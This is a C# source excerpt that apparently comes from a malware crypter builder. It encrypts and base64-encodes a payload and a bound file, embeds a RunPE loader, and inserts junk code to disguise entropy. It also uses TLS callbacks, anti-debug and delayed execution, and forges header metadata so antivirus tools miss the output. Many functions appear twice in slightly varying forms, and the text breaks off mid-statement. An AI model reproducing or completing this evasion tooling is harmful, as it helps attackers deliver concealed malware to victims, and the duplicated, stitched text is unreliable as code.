public static string CompileArbitrary(string PathName, NewPE PE)
{
string TmpFile = Path.GetTempFileName();
ProcessStartInfo psi = new ProcessStartInfo();
psi.Arguments = String.Format("-i \"{0}/\" -f bin \"{1}\" -o \"{2}\"",
PE.PeDirectory.RootDirectoryPath,
PathName,
TmpFile);
psi.FileName = PE.PeDirectory.CompilerPath;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
using (Process Proc = Process.Start(psi))
{
using (StreamReader sReader = Proc.StandardOutput)
{
string res = sReader.ReadToEnd();
}
}
if (File.Exists(TmpFile))
{
return(TmpFile);
}
else
{
return(null);
}
}
public static void CalculateNtHeader(NewPE PE, int nCountImportedModules)
{
PE.NtHeader.OptionalHeader.SizeOfCode = ALIGN_UP(GetSectionByName(".text", PE).VirtualSize, PE.NtHeader.OptionalHeader.FileAlignment);
PE.NtHeader.OptionalHeader.SizeOfInitializedData = ALIGN_UP(GetSectionByName(".idata", PE).VirtualSize, PE.NtHeader.OptionalHeader.FileAlignment) +
ALIGN_UP(GetSectionByName(".data", PE).VirtualSize, PE.NtHeader.OptionalHeader.FileAlignment);
#if TLS
PE.NtHeader.OptionalHeader.SizeOfInitializedData += ALIGN_UP(GetSectionByName(".bss", PE).VirtualSize, PE.NtHeader.OptionalHeader.FileAlignment);
#endif
PE.NtHeader.OptionalHeader.BaseOfCode = GetSectionByName(".text", PE).VirtualAddress;
PE.NtHeader.OptionalHeader.BaseOfData = GetSectionByName(".idata", PE).VirtualAddress; // .data?
PE.NtHeader.OptionalHeader.SizeOfHeaders = ALIGN_UP(PE.HeaderSize, PE.NtHeader.OptionalHeader.FileAlignment);
PE.NtHeader.OptionalHeader.SizeOfImage = PE.Sections.Last.Value.VirtualAddress + ALIGN_UP(PE.Sections.Last.Value.VirtualSize, PE.NtHeader.OptionalHeader.SectionAlignment);
PE.NtHeader.OptionalHeader.AddressOfEntryPoint = (uint)(GetSectionByName(".text", PE).VirtualAddress + PE.JunkInfo.SIZE_PRE_EP_FUNCTIONS);
// uint _magic = (uint)((nCountImportedModules + 1) * 20);
PE.NtHeader.OptionalHeader.ImportDirectory.VirtualAddress = GetSectionByName(".idata", PE).VirtualAddress;
PE.NtHeader.OptionalHeader.ImportDirectory.Size = GetSectionByName(".idata", PE).VirtualSize; // _magic;
/// PE.NtHeader.OptionalHeader.ImportAddressTableDirectory.VirtualAddress = GetSectionByName(".idata", PE).VirtualAddress + _magic;
/// PE.NtHeader.OptionalHeader.ImportAddressTableDirectory.Size = GetSectionByName(".idata", PE).VirtualSize - _magic;
PE.NtHeader.OptionalHeader.TLSDirectory.VirtualAddress = GetSectionByName(".data", PE).VirtualAddress + (uint)PE.PeDirectory.RunPEObjectPath.ReadBytes().Length + 16;
PE.NtHeader.OptionalHeader.TLSDirectory.Size = 0x24;
#if TLS
PE.NtHeader.OptionalHeader.TLSDirectory.VirtualAddress = GetSectionByName(".data", PE).VirtualAddress + (uint)PE.PeDirectory.RunPEObjectPath.ReadBytes().Length + 16;
PE.NtHeader.OptionalHeader.TLSDirectory.Size = 0x24;
#endif
}
public static void EncryptCodeAndAddKey(NewPE PE)
{
byte[] pKey = new byte[16];
Keys.PopulateBuffer(pKey);
byte[] pRunPE = PE.PeDirectory.RunPEObjectPath.ReadBytes();
Xor.EncodeDecodeData(pRunPE, pKey);
if (File.Exists(PE.PeDirectory.RunPEObjectPath))
{
File.Delete(PE.PeDirectory.RunPEObjectPath);
}
PE.PeDirectory.RunPEObjectPath.WriteFile(pRunPE);
string KeyInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "runpe_key.inc");
string Format = pKey.ToASMBuffer();
if (File.Exists(KeyInclude))
{
File.Delete(KeyInclude);
}
File.WriteAllText(KeyInclude, Format);
PEFactory.CompileDataSection(PE);
}
public static void InitializeNtHeader(NewPE PE)
{
// <--- File Header --->
{
PE.NtHeader.FileHeader.Machine = 0x14c;
PE.NtHeader.FileHeader.NumberOfSections = (ushort)PE.Sections.Count;
PE.NtHeader.FileHeader.TimeDateStamp = (uint)_Random.Next(0x40000000, 0x4C000000);
PE.NtHeader.FileHeader.PointerToSymbolTable = 0;
PE.NtHeader.FileHeader.NumberOfSymbols = 0;
PE.NtHeader.FileHeader.SizeOfOptionalHeader = 0xE0;
PE.NtHeader.FileHeader.Characteristics = 0x103;
}
// <--- Optional Header --->
{
// <--- LinkerVersions must match the Rich Signature --->
PE.NtHeader.OptionalHeader.MajorLinkerVersion = 0x06;
PE.NtHeader.OptionalHeader.MinorLinkerVersion = 0x00;
PE.NtHeader.OptionalHeader.MajorOperatingSystemVersion = 4;
PE.NtHeader.OptionalHeader.MajorImageVersion = 4;
PE.NtHeader.OptionalHeader.MajorSubsystemVersion = 4;
PE.NtHeader.OptionalHeader.DllCharacteristics = 0x00;
PE.NtHeader.OptionalHeader.ImageBase = 0x00400000;
PE.NtHeader.OptionalHeader.SectionAlignment = 0x1000;
PE.NtHeader.OptionalHeader.FileAlignment = 0x200;
}
}
public static void InitializeNtHeader(NewPE PE)
{
// <--- File Header --->
{
PE.NtHeader.FileHeader.Machine = 0x14c;
PE.NtHeader.FileHeader.NumberOfSections = (ushort)PE.Sections.Count;
PE.NtHeader.FileHeader.TimeDateStamp = (uint)_Random.Next(0x40000000, 0x4C000000);
PE.NtHeader.FileHeader.PointerToSymbolTable = 0;
PE.NtHeader.FileHeader.NumberOfSymbols = 0;
PE.NtHeader.FileHeader.SizeOfOptionalHeader = 0xE0;
PE.NtHeader.FileHeader.Characteristics = 0x103;
}
// <--- Optional Header --->
{
// <--- LinkerVersions must match the Rich Signature --->
PE.NtHeader.OptionalHeader.MajorLinkerVersion = 0x06;
PE.NtHeader.OptionalHeader.MinorLinkerVersion = 0x00;
PE.NtHeader.OptionalHeader.MajorOperatingSystemVersion = 4;
PE.NtHeader.OptionalHeader.MajorImageVersion = 4;
PE.NtHeader.OptionalHeader.MajorSubsystemVersion = 4;
PE.NtHeader.OptionalHeader.DllCharacteristics = 0x00;
PE.NtHeader.OptionalHeader.ImageBase = 0x00400000;
PE.NtHeader.OptionalHeader.SectionAlignment = 0x1000;
PE.NtHeader.OptionalHeader.FileAlignment = 0x200;
}
}
public static void RemoveAntiDebug(NewPE PE, bool _RemoveAntiDebug)
{
if (_RemoveAntiDebug)
{
File.Delete(PE.PeDirectory.AntiDebugIncPath);
File.WriteAllText(PE.PeDirectory.AntiDebugIncPath, string.Empty);
}
}
public void WriteLogicalTrashToTLSCallback(xNewPE PE, ref JunkCodeInfo JCI, int Multiplier)
{
string TlsCallbackInc = Path.Combine(PE.PeDirectory.IncludeDirectory, "tls_callback.inc");
int sizeOfTLS = PEFactory.ComputeArbitrarySize(TlsCallbackInc, PE);
int size_junk_added = 0;
string[] tls = TlsCallbackInc.ReadLines();
for (int i = 0; i < tls.Length; i++)
{
if (tls[i].Contains(";[JUNK_NO_PRESERVE]"))
{
int len_trash = Rand.Next(0x100, 0x200);
byte[] trash_buffer = GenerateLogicalTrash(len_trash, 0, 0, 0, 0);
size_junk_added += trash_buffer.Length;
tls[i] = trash_buffer.ToASMBuffer();
trash_buffer = new byte[0];
GC.Collect();
}
if (tls[i].Contains(";[JUNK_FUNCS]"))
{
int xx = Rand.Next(3 * Multiplier, 5 * Multiplier);
for (int jj = 0; jj < xx; jj++)
{
int func_len = Rand.Next(0x100, 0x120);
byte[] func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x1000);
tls[i] = string.Concat(tls[i], Environment.NewLine, func_buffer.ToASMBuffer(), Environment.NewLine);
}
}
}
if (File.Exists(TlsCallbackInc))
{
File.Delete(TlsCallbackInc);
}
TlsCallbackInc.WriteLines(tls);
sizeOfTLS = PEFactory.ComputeArbitrarySize(TlsCallbackInc, PE);
JCI.SIZE_TLS_CALLBACK = sizeOfTLS + 3; // prologue;
string AddrPayloadInc = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_address.inc");
string Format = "PAYLOAD_ADDRESS EQU 0x{0}";
Format = string.Format(Format, (JCI.SIZE_PRE_EP_FUNCTIONS + JCI.SIZE_TLS_CALLBACK + JCI.SIZE_EP_FUNCTION + JCI.SIZE_POST_EP_FUNCTIONS).ToString("X8"));
File.WriteAllText(AddrPayloadInc, Format);
GC.Collect();
}
public static void EncryptAndEncodeBind(NewPE PE, string BindPath)
{
byte[] pKey = PE.PeDirectory.PayloadKeyIncPath.ReadBytes();
byte[] pBind = BindPath.ReadBytes();
Xor.EncodeDecodeData(pBind, pKey);
pBind = new ASCIIEncoding().GetBytes(Convert.ToBase64String(pBind));
if (File.Exists(PE.PeDirectory.BindIncPath))
{
File.Delete(PE.PeDirectory.BindIncPath);
}
File.WriteAllBytes(PE.PeDirectory.BindIncPath, pBind);
}
public static void InitializeSections(NewPE PE)
{
// <--- Text Section --->
{
PE_SECTION_HEADER TextSectionHeader = new PE_SECTION_HEADER()
{
Name = new char[] { '.', 't', 'e', 'x', 't' },
Characteristics = 0x60000020
};
PE.Sections.AddFirst(TextSectionHeader);
}
// <--- IData Section --->
{
PE_SECTION_HEADER IDataSectionHeader = new PE_SECTION_HEADER()
{
Name = new char[] { '.', 'i', 'd', 'a', 't', 'a' },
Characteristics = 0x40000040
};
PE.Sections.AddLast(IDataSectionHeader);
}
// <--- Data Section --->
{
PE_SECTION_HEADER DataSectionHeader = new PE_SECTION_HEADER()
{
Name = new char[] { '.', 'd', 'a', 't', 'a' },
Characteristics = 0xC0000040
};
PE.Sections.AddLast(DataSectionHeader);
}
#if TLS
// <--- TLS Section --->
{
PE_SECTION_HEADER TLSSectionHeader = new PE_SECTION_HEADER()
{
Name = new char[] { '.', 'b', 's', 's' },
Characteristics = 0xC0000040
};
PE.Sections.AddLast(TLSSectionHeader);
}
#endif
}
public static void InitializeSections(NewPE PE)
{
// <--- Text Section --->
{
PE_SECTION_HEADER TextSectionHeader = new PE_SECTION_HEADER()
{
Name = new char[] { '.', 't', 'e', 'x', 't' },
Characteristics = 0x60000020
};
PE.Sections.AddFirst(TextSectionHeader);
}
// <--- IData Section --->
{
PE_SECTION_HEADER IDataSectionHeader = new PE_SECTION_HEADER()
{
Name = new char[] { '.', 'i', 'd', 'a', 't', 'a' },
Characteristics = 0x40000040
};
PE.Sections.AddLast(IDataSectionHeader);
}
// <--- Data Section --->
{
PE_SECTION_HEADER DataSectionHeader = new PE_SECTION_HEADER()
{
Name = new char[] { '.', 'd', 'a', 't', 'a' },
Characteristics = 0xC0000040
};
PE.Sections.AddLast(DataSectionHeader);
}
#if TLS
// <--- TLS Section --->
{
PE_SECTION_HEADER TLSSectionHeader = new PE_SECTION_HEADER()
{
Name = new char[] { '.', 'b', 's', 's' },
Characteristics = 0xC0000040
};
PE.Sections.AddLast(TLSSectionHeader);
}
#endif
}
public static void FixDecryptorLoop(NewPE PE)
{
string RunPELengthInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "runpe_length.inc");
string Format = "RUNPE_CODE_LENGTH EQU 0x{0}";
if (File.Exists(RunPELengthInclude))
{
File.Delete(RunPELengthInclude);
}
Format = string.Format(Format, PE.PeDirectory.RunPEObjectPath.ReadBytes().Length.ToString("X8"));
File.WriteAllText(RunPELengthInclude, Format);
PEFactory.CompileTextSection(PE);
}
public void WriteDelayExecutionTrash(xNewPE PE, bool bLong)
{
string[] olaf = PE.PeDirectory.DelayExecutionIncPath.ReadLines();
byte[] trash_buffer;
if (!bLong)
{
int len_trash = Rand.Next(0x100, 0x120);
trash_buffer = GenerateLogicalTrash(len_trash, 0, 0, 0, 0);
}
else
{
int len_trash = Rand.Next(0x100, 0x120);
trash_buffer = GenerateLogicalTrash(len_trash, 0, 0, 0, 0);
}
for (int i = 0; i < olaf.Length; i++)
{
if (olaf[i].Contains("0x69"))
{
if (!bLong)
{
olaf[i] = olaf[i].Replace("0x69", string.Format("0x{0}", Rand.Next(25, 50).ToString("X8")));
}
else
{
olaf[i] = olaf[i].Replace("0x69", string.Format("0x{0}", Rand.Next(3500000 * 5, 6000000 * 5).ToString("X8")));
}
}
if (olaf[i].Contains(";[JUNK_NO_PRESERVE]"))
{
if (!bLong)
{
olaf[i] = trash_buffer.ToASMBuffer();
}
else
{
olaf[i] = trash_buffer.ToASMBuffer();
}
}
}
File.Delete(PE.PeDirectory.DelayExecutionIncPath);
PE.PeDirectory.DelayExecutionIncPath.WriteLines(olaf);
}
public static void ConstructTLSCallback(NewPE PE)
{
string TLSOffsetInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "tls_callback_offset.inc");
string Format = "TLS_CALLBACK_OFFSET EQU 0x{0}";
if (File.Exists(TLSOffsetInclude))
{
File.Delete(TLSOffsetInclude);
}
Format = string.Format(Format, (PE.JunkInfo.SIZE_PRE_EP_FUNCTIONS + PE.JunkInfo.SIZE_EP_FUNCTION).ToString("X8"));
File.AppendAllText(TLSOffsetInclude, Format);
PEFactory.CompileDataSection(PE);
//PEFactory.CompileTLSSection(PE);
}
public static void AddSectionDatas(NewPE PE)
{
File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
File.AppendAllText(PE.PeDirectory.MainPath, string.Format("align 0x{0}, db 0", PE.NtHeader.OptionalHeader.FileAlignment.ToString("X8")));
File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
foreach (PE_SECTION_HEADER SectionHeader in PE.Sections)
{
string WriteableName = string.Concat(new string(SectionHeader.Name).TrimStart('.').ToUpper(), ":");
File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
File.AppendAllText(PE.PeDirectory.MainPath, WriteableName);
File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
File.AppendAllText(PE.PeDirectory.MainPath, string.Format(
"\tincbin \"obj/{0}\"",
Path.GetFileName(GetObjPathFromSectionName(new string(SectionHeader.Name), PE))));
File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
File.AppendAllText(PE.PeDirectory.MainPath, string.Format("align 0x{0}, db 0", PE.NtHeader.OptionalHeader.FileAlignment.ToString("X8")));
File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
}
}
public static void EncryptAndEncodePayload(NewPE PE, string PayloadPath)
{
byte[] pKey = new byte[16];
Keys.PopulateBuffer(pKey);
byte[] pFileBuffer = PayloadPath.ReadBytes();
Xor.EncodeDecodeData(pFileBuffer, pKey);
pFileBuffer = new ASCIIEncoding().GetBytes(Convert.ToBase64String(pFileBuffer));
string PayloadLengthInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_length.inc");
string Format = "PAYLOAD_LENGTH EQU 0x{0}";
Format = string.Format(Format, pFileBuffer.Length.ToString("X8"));
if (File.Exists(PayloadLengthInclude))
{
File.Delete(PayloadLengthInclude);
}
File.WriteAllText(PayloadLengthInclude, Format);
string PayloadKeyInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_key.bin");
string PayloadInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload.bin");
if (File.Exists(PayloadKeyInclude))
{
File.Delete(PayloadKeyInclude);
}
if (File.Exists(PayloadInclude))
{
File.Delete(PayloadInclude);
}
File.WriteAllBytes(PayloadKeyInclude, pKey);
File.WriteAllBytes(PayloadInclude, pFileBuffer);
}
private static string GetObjPathFromSectionName(string Name, NewPE PE)
{
return(Directory.GetFiles(PE.PeDirectory.ObjDirectory).Where(F => Path.GetFileNameWithoutExtension(F) == Name.Trim('.')).FirstOrDefault());
}
public void WriteLogicalFunctionsToTextSection(xNewPE PE, ref JunkCodeInfo JCI, int Multiplier)
{
string TxtSect = PE.PeDirectory.TextSectionPath.ReadText();
int size_pre_ep = 0;
int size_ep = 0;
int size_post_ep = 0;
int pre_ep_func_cnt = Rand.Next(5 * Multiplier, 10 * Multiplier);
int post_ep_func_cnt = Rand.Next(5 * Multiplier, 10 * Multiplier);
// pre - ep
for (int i = 0; i < pre_ep_func_cnt; i++)
{
int index_of = TxtSect.IndexOf(";[PRE_EP_FUNCTIONS]");
if (index_of > -1)
{
int func_len = Rand.Next(0x120, 0x200);
byte[] func_buffer;
if (Rand.NextDouble() >= 0.5)
{
func_buffer = new DataConstructor().GenData(func_len, func_len);
}
else
{
func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000);
}
// GenerateLogicalFunction(func_len, 0, 0, 0, 0);//GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000);
// Console.WriteLine("Entropy Func: {0}", calc_entropy(func_buffer));
// pad entropy with zeros after func
//int pad_len = Rand.Next(0x10, 0x25);
//Array.Resize(ref func_buffer, func_buffer.Length + pad_len);
TxtSect = TxtSect.Insert(index_of, func_buffer.ToASMBuffer() + Environment.NewLine);
size_pre_ep += func_buffer.Length;
}
}
JCI.SIZE_PRE_EP_FUNCTIONS = size_pre_ep;
// ep -
{
int index_of = TxtSect.IndexOf(";[EP_FUNCTION]");
if (index_of > -1)
{
int func_len = Rand.Next(0x120, 0x140); // const
byte[] func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000);
// pad entropy with zeros after func
//int pad_len = Rand.Next(0x10, 0x25);
//Array.Resize(ref func_buffer, func_buffer.Length + pad_len);
TxtSect = TxtSect.Insert(index_of, func_buffer.ToASMBuffer() + Environment.NewLine);
size_ep += func_buffer.Length;
}
}
JCI.SIZE_EP_FUNCTION = size_ep;
//// post - ep
for (int i = 0; i < post_ep_func_cnt; i++)
{
int index_of = TxtSect.IndexOf(";[POST_EP_FUNCTIONS]");
if (index_of > -1)
{
int func_len = Rand.Next(0x120, 0x200);
byte[] func_buffer;
if (Rand.NextDouble() >= 0.5)
{
func_buffer = new DataConstructor().GenData(func_len, func_len);
}
else
{
func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000);
}
// Console.WriteLine("Entropy Func: {0}", calc_entropy(func_buffer));
// pad entropy with zeros after func
//int pad_len = Rand.Next(0x10, 0x25);
//Array.Resize(ref func_buffer, func_buffer.Length + pad_len);
TxtSect = TxtSect.Insert(index_of, func_buffer.ToASMBuffer() + Environment.NewLine);
size_post_ep += func_buffer.Length;
}
}
JCI.SIZE_POST_EP_FUNCTIONS = size_post_ep;
// PAD ENTROPY
//int size_of_entropy_pad = 0x200; ;// ALIGN_UP(Rand.Next(0x200, 0x1000), (int)PE.NtHeader.OptionalHeader.FileAlignment);
//byte[] zero_fill = new byte[0x1000];
//string path_inc = Path.Combine(PE.PeDirectory.IncludeDirectory, "zerofill.bin");
//path_inc.WriteFile(zero_fill);
// JCI.SIZE_ENTROPY_PAD = (size_of_entropy_pad * 2);
if (File.Exists(PE.PeDirectory.TextSectionPath))
{
File.Delete(PE.PeDirectory.TextSectionPath);
}
PE.PeDirectory.TextSectionPath.WriteText(TxtSect, StringEncoding.ASCII);
GC.Collect();
}
public static string CompileArbitrary(string PathName, NewPE PE)
{
string TmpFile = Path.GetTempFileName();
ProcessStartInfo psi = new ProcessStartInfo();
psi.Arguments = String.Format("-i \"{0}/\" -f bin \"{1}\" -o \"{2}\"",
PE.PeDirectory.RootDirectoryPath,
PathName,
TmpFile);
psi.FileName = PE.PeDirectory.CompilerPath;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
using (Process Proc = Process.Start(psi))
{
using (StreamReader sReader = Proc.StandardOutput)
{
string res = sReader.ReadToEnd();
}
}
if (File.Exists(TmpFile))
{
return TmpFile;
}
else
{
return null;
}
}
public static void CompileTLSSection(NewPE PE)
{
CompileSection("bss", PE);
}
private static void ReplaceSectionByName(string Name, PE_SECTION_HEADER NewSection, NewPE PE)
{
PE_SECTION_HEADER oldSection = GetSectionByName(Name, PE);
PE.Sections.Find(oldSection).Value = NewSection;
}
private static string GetObjPathFromSectionName(string Name, NewPE PE)
{
return Directory.GetFiles(PE.PeDirectory.ObjDirectory).Where(F => Path.GetFileNameWithoutExtension(F) == Name.Trim('.')).FirstOrDefault();
}
public static void RemoveAntiDebug(NewPE PE, bool _RemoveAntiDebug)
{
if (_RemoveAntiDebug)
{
File.Delete(PE.PeDirectory.AntiDebugIncPath);
File.WriteAllText(PE.PeDirectory.AntiDebugIncPath, string.Empty);
}
}
private static void CompileSection(string SectionName, NewPE _PE)
{
string SectionSourcePath;
string SectionObjPath;
switch (SectionName)
{
case "text":
SectionSourcePath = _PE.PeDirectory.TextSectionPath;
SectionObjPath = _PE.PeDirectory.TextObjectPath;
break;
case "data":
SectionSourcePath = _PE.PeDirectory.DataSectionPath;
SectionObjPath = _PE.PeDirectory.DataObjectPath;
break;
case "idata":
SectionSourcePath = _PE.PeDirectory.IDataSectionPath;
SectionObjPath = _PE.PeDirectory.IDataObjectPath;
break;
case "bss":
SectionSourcePath = _PE.PeDirectory.TLSSectionPath;
SectionObjPath = _PE.PeDirectory.TLSObjectPath;
break;
case "runpe":
SectionSourcePath = _PE.PeDirectory.RunPESectionPath;
SectionObjPath = _PE.PeDirectory.RunPEObjectPath;
break;
case "main":
SectionSourcePath = _PE.PeDirectory.MainPath;
SectionObjPath = _PE.PeDirectory.SavePath;
break;
default:
SectionSourcePath = string.Empty;
SectionObjPath = string.Empty;
break;
}
if (File.Exists(SectionObjPath))
{
File.Delete(SectionObjPath);
}
ProcessStartInfo psi = new ProcessStartInfo();
psi.Arguments = String.Format("-i \"{0}/\" -f bin \"{1}\" -o \"{2}\"",
_PE.PeDirectory.RootDirectoryPath,
SectionSourcePath,
SectionObjPath);
psi.FileName = _PE.PeDirectory.CompilerPath;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
using (Process Proc = Process.Start(psi))
{
using (StreamReader sReader = Proc.StandardOutput)
{
string res = sReader.ReadToEnd();
}
}
}
public static void CompileTLSSection(NewPE PE)
{
CompileSection("bss", PE);
}
public static void CompileMain(NewPE PE)
{
CompileSection("main", PE);
}
public static void CompileRunPESection(NewPE PE)
{
CompileSection("runpe", PE);
}
public static void CompileIDataSection(NewPE PE)
{
CompileSection("idata", PE);
}
public static void CompileTextSection(NewPE PE)
{
CompileSection("text", PE);
}
public static void EncryptAndEncodePayload(NewPE PE, string PayloadPath)
{
byte[] pKey = new byte[16];
Keys.PopulateBuffer(pKey);
byte[] pFileBuffer = PayloadPath.ReadBytes();
Xor.EncodeDecodeData(pFileBuffer, pKey);
pFileBuffer = new ASCIIEncoding().GetBytes(Convert.ToBase64String(pFileBuffer));
string PayloadLengthInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_length.inc");
string Format = "PAYLOAD_LENGTH EQU 0x{0}";
Format = string.Format(Format, pFileBuffer.Length.ToString("X8"));
if (File.Exists(PayloadLengthInclude))
File.Delete(PayloadLengthInclude);
File.WriteAllText(PayloadLengthInclude, Format);
string PayloadKeyInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_key.bin");
string PayloadInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload.bin");
if (File.Exists(PayloadKeyInclude))
File.Delete(PayloadKeyInclude);
if (File.Exists(PayloadInclude))
File.Delete(PayloadInclude);
File.WriteAllBytes(PayloadKeyInclude, pKey);
File.WriteAllBytes(PayloadInclude, pFileBuffer);
}
public void WriteLogicalTrashToTLSCallback(xNewPE PE, ref JunkCodeInfo JCI, int Multiplier)
{
string TlsCallbackInc = Path.Combine(PE.PeDirectory.IncludeDirectory, "tls_callback.inc");
int sizeOfTLS = PEFactory.ComputeArbitrarySize(TlsCallbackInc, PE);
int size_junk_added = 0;
string[] tls = TlsCallbackInc.ReadLines();
for (int i = 0; i < tls.Length; i++)
{
if (tls[i].Contains(";[JUNK_NO_PRESERVE]"))
{
int len_trash = Rand.Next(0x100, 0x200);
byte[] trash_buffer = GenerateLogicalTrash(len_trash, 0, 0, 0, 0);
size_junk_added += trash_buffer.Length;
tls[i] = trash_buffer.ToASMBuffer();
trash_buffer = new byte[0];
GC.Collect();
}
if (tls[i].Contains(";[JUNK_FUNCS]"))
{
int xx = Rand.Next(3 * Multiplier, 5 * Multiplier);
for (int jj = 0; jj < xx; jj++)
{
int func_len = Rand.Next(0x100, 0x120);
byte[] func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x1000);
tls[i] = string.Concat(tls[i], Environment.NewLine, func_buffer.ToASMBuffer(), Environment.NewLine);
}
}
}
if (File.Exists(TlsCallbackInc))
File.Delete(TlsCallbackInc);
TlsCallbackInc.WriteLines(tls);
sizeOfTLS = PEFactory.ComputeArbitrarySize(TlsCallbackInc, PE);
JCI.SIZE_TLS_CALLBACK = sizeOfTLS + 3; // prologue;
string AddrPayloadInc = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_address.inc");
string Format = "PAYLOAD_ADDRESS EQU 0x{0}";
Format = string.Format(Format, (JCI.SIZE_PRE_EP_FUNCTIONS + JCI.SIZE_TLS_CALLBACK + JCI.SIZE_EP_FUNCTION + JCI.SIZE_POST_EP_FUNCTIONS).ToString("X8"));
File.WriteAllText(AddrPayloadInc, Format);
GC.Collect();
}
public static void EncryptAndEncodeBind(NewPE PE, string BindPath)
{
byte[] pKey = PE.PeDirectory.PayloadKeyIncPath.ReadBytes();
byte[] pBind = BindPath.ReadBytes();
Xor.EncodeDecodeData(pBind, pKey);
pBind = new ASCIIEncoding().GetBytes(Convert.ToBase64String(pBind));
if (File.Exists(PE.PeDirectory.BindIncPath))
File.Delete(PE.PeDirectory.BindIncPath);
File.WriteAllBytes(PE.PeDirectory.BindIncPath, pBind);
}
private static void ReplaceSectionByName(string Name, PE_SECTION_HEADER NewSection, NewPE PE)
{
PE_SECTION_HEADER oldSection = GetSectionByName(Name, PE);
PE.Sections.Find(oldSection).Value = NewSection;
}
public static void AddSectionDatas(NewPE PE)
{
File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
File.AppendAllText(PE.PeDirectory.MainPath, string.Format("align 0x{0}, db 0", PE.NtHeader.OptionalHeader.FileAlignment.ToString("X8")));
File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
foreach (PE_SECTION_HEADER SectionHeader in PE.Sections)
{
string WriteableName = string.Concat(new string(SectionHeader.Name).TrimStart('.').ToUpper(), ":");
File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
File.AppendAllText(PE.PeDirectory.MainPath, WriteableName);
File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
File.AppendAllText(PE.PeDirectory.MainPath, string.Format(
"\tincbin \"obj/{0}\"",
Path.GetFileName(GetObjPathFromSectionName(new string(SectionHeader.Name), PE))));
File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
File.AppendAllText(PE.PeDirectory.MainPath, string.Format("align 0x{0}, db 0", PE.NtHeader.OptionalHeader.FileAlignment.ToString("X8")));
File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
}
}
public static void CompileIDataSection(NewPE PE)
{
CompileSection("idata", PE);
}
public static PE_SECTION_HEADER GetSectionByName(string Name, NewPE PE)
{
return PE.Sections.Where(Section => new string(Section.Name) == Name).FirstOrDefault();
}
public static PE_SECTION_HEADER GetSectionByName(string Name, NewPE PE)
{
return(PE.Sections.Where(Section => new string(Section.Name) == Name).FirstOrDefault());
}
public static void CompileTextSection(NewPE PE)
{
CompileSection("text", PE);
}
public static void CalculateSectionHeaders(NewPE PE)
{
PE_SECTION_HEADER shText = GetSectionByName(".text", PE);
PE_SECTION_HEADER shIData = GetSectionByName(".idata", PE);
PE_SECTION_HEADER shData = GetSectionByName(".data", PE);
#if TLS
PE_SECTION_HEADER shTLS = GetSectionByName(".bss", PE);
#endif
uint sizeOfText = (uint)PE.PeDirectory.TextObjectPath.ReadBytes().Length;
uint sizeOfIData = (uint)PE.PeDirectory.IDataObjectPath.ReadBytes().Length;
uint sizeOfData = (uint)PE.PeDirectory.DataObjectPath.ReadBytes().Length;
#if TLS
uint sizeOfTLS = (uint)PE.PeDirectory.TLSObjectPath.ReadBytes().Length;
#endif
/* COMPUTE TEXT */
shText.VirtualSize = sizeOfText;
shText.VirtualAddress = PE.NtHeader.OptionalHeader.SectionAlignment;
shText.SizeOfRawData = ALIGN_UP(sizeOfText, PE.NtHeader.OptionalHeader.FileAlignment);
shText.PointerToRawData = 0;
/* COMPUTE IDATA */
shIData.VirtualSize = sizeOfIData;
shIData.VirtualAddress =
((shText.VirtualAddress + ALIGN_UP(shText.SizeOfRawData, PE.NtHeader.OptionalHeader.SectionAlignment)));
shIData.SizeOfRawData = ALIGN_UP(sizeOfIData, PE.NtHeader.OptionalHeader.FileAlignment);
shIData.PointerToRawData = 0;
/* COMPUTE DATA */
shData.VirtualSize = sizeOfData;
shData.VirtualAddress =
((shIData.VirtualAddress + ALIGN_UP(shIData.SizeOfRawData, PE.NtHeader.OptionalHeader.SectionAlignment)));
shData.SizeOfRawData = ALIGN_UP(sizeOfData, PE.NtHeader.OptionalHeader.FileAlignment);
shData.PointerToRawData = 0;
#if TLS
/* COMPUTE TLS */
shTLS.VirtualSize = sizeOfTLS;
shTLS.VirtualAddress =
((shData.VirtualAddress + ALIGN_UP(shData.SizeOfRawData, PE.NtHeader.OptionalHeader.SectionAlignment)));
shTLS.SizeOfRawData = ALIGN_UP(sizeOfTLS, PE.NtHeader.OptionalHeader.FileAlignment);
shTLS.PointerToRawData = 0;
#endif
string SectionHeadersInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "section_addresses.inc");
if (File.Exists(SectionHeadersInclude))
File.Delete(SectionHeadersInclude);
#if TLS
string Format = "TEXT_SECTION_ADDRESS EQU 0x{0}\n" +
